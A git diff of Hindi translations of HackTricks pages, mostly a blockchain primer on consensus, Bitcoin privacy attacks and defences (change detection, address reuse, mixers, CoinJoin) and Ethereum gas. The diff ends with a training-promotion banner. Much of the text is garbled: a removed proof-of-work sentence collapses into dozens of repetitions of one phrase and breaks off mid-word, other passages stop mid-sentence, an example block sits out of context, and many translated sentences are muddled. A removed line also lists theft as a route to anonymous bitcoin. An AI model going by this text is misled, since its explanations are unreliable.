वातावरण में कुछ मूल्य वाली चीज है)। -* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं। -* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**। -* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**। -* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**। +- **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना। +- **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है। +- **टोकन और सिक्के** अंतर करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं। +- **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं। +- **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है। +- **डीईएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं। -# सहमति तंत्र +## सहमति तंत्र -एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए**। +सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं: +- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है। +- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है। -प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै -``` +## बिटकॉइन महत्वपूर्ण अंश + +### लेन-देन + +बिटकॉइन लेन-देन में प्रायोजित धन के बीच फंड ले जाने की शामिल होती है। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित की जाती है, सुनिश्चित करती है कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है। + +#### मुख्य घटक: + +- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन की अधिक संकेतन की आवश्यकता होती है। लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं। + +### लाइटनिंग नेटवर्क + +बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर एकाधिक लेन-देन की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करने के लिए। + +## बिटकॉइन गोपनीयता चिंताएँ + +गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन के लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं। + +## बिटकॉइन गोपनीयता हमले + +# बिटकॉइन गोपनीयता हमलों का सारांश + +बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं। + +## **सामान्य इनपुट स्वामित्व मान्यता** + +सामान्य रूप से विभिन्न उपयोगकर्ताओं के इनपुट एक ही लेन-देन में मिलाए जाने की कठिनाई के कारण, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का माना जाता है**। + +## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन** + +एक यूटीएक्सओ, या **अनस्पेंट ट्रांजैक्शन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जाता है। + +### उदाहरण +```bash 2 btc --> 4 btc 3 btc 1 btc ``` -मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है। +## **बाध्य पता पुनः उपयोग** -यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए: -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` -## मजबूर पता पुनरउपयोग +हमलावार छोटी राशि पहले से उपयोग किए गए पतों पर भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला देता है, जिससे पते को एक साथ जोड़ा जा सकता है। -**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है। +### सही वॉलेट व्यवहार +इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए। -यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है। +## **अन्य ब्लॉकचेन विश्लेषण तकनीकें** -वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें। +- **सटीक भुगतान राशियाँ:** परिवर्तन के बिना लेन-देन संभावित रूप से एक ही उपयोगकर्ता द्वारा स्वामित्व में होती हैं। +- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है। +- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जो विश्लेषकों को सॉफ़्टवेयर का पहचान करने और संभावित रूप से परिवर्तन पता करने की अनुमति देते हैं। +- **राशि और समय संबंध:** लेन-देन के समय या राशियों का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है। -## अन्य ब्लॉकचेन विश्लेषण +## **ट्रैफिक विश्लेषण** -* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है**। -* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए। -* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है। -* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**। +नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था कई बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देन की मॉनिटरिंग क्षमता बढ़ जाती है। -## ट्रैफिक विश्लेषण - -कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\ -यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है। - -एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\ -इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो। - -## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले - -अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) - -# अनाम बिटकॉइन - -## बिटकॉइन गुमनामता से प्राप्त करना - -* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें। -* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें। -* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं। -* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए। - -## मिक्सर - -एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**। - -हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\ -कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं। - -## कॉइनजॉइन - -**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\ -यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**। - -बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`। - -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट -``` +## अधिक +गोपनीयता हमलों और रक्षाओं की व्यापक सूची के लिए [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं। +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -# बिटकॉइन गोपनीयता अच्छी प्रथाएं +Transactions जैसे ऊपर कर सकते हैं PayJoin, गोपनीयता को बढ़ावा देते हुए सामान्य बिटकॉइन लेन-देन से असंवेदनशील रह सकते हैं। -## वॉलेट समक्रमण +**PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, यह लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास है। -बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)। +# क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम प्रथाएं -* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। -* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा। +## **वॉलेट समक्रमण तकनीकें** -## टॉर +गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो विधियाँ उभरती हैं: -बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें**। +- **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है। +- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह विधि हर ब्लॉक के लिए फ़िल्टर बनाने का सम्मिलित करती है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबंधित लेन-देनों की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं। -## पते का पुनः उपयोग न करना +## **गुप्तचरता के लिए Tor का उपयोग** -**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है। +बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जो नेटवर्क के साथ बातचीत करते समय गोपनीयता को बढ़ावा देता है। -## एकाधिक लेन-देन +## **पते का पुनः उपयोग रोकना** -**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं। +गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पते का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि लेन-देनों को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते का पुनः उपयोग निषेध करते हैं। -## बदला टालना +## **लेन-देन गोपनीयता के लिए रणनीतियाँ** -बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है। +- **एकाधिक लेन-देन**: एक भुगतान को कई लेन-देनों में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है। +- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर लेन-देन के लिए विकल्प चुनना गोपनीयता को बढ़ावा देता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है। +- **एकाधिक बदलाव आउटपुट्स**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव आउटपुट्स उत्पन्न करना भी गोपनीयता में सुधार कर सकता है। -## एकाधिक बदला आउटपुट +# **मोनेरो: एक गुप्तचरता का प्रकाश** -यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है। +मोनेरो डिजिटल लेन-देनों में पूर्ण गुप्तचरता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है। -# मोनेरो +# **इथेरियम: गैस और लेन-देन** -जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है। +## **गैस को समझना** -# इथेरियम +इथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को गैस मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खननकर्ताओं को प्रोत्साहित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक शुल्क न देने के लिए एक अधिकतम शुल्क सेट कर सकते हैं, अतिरिक्त राशि को वापस कर देते हैं। -## गैस +## **लेन-देन कार्यान्वयन** -गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है। +इथेरियम में लेन-देन में एक भेजने वाला और एक प्राप्तकर्ता शामिल होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और खनन किए जाने चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती। -गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है। +ये प्रथाएँ और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं। -एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें: +## संदर्भ -मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है। - -ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ। - -जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा। - -इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer +* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) +* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) +* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions) +* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) +* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) +* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) diff --git a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 5c0040cdf..cfaf31c55 100644 --- a/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -1,29 +1,30 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
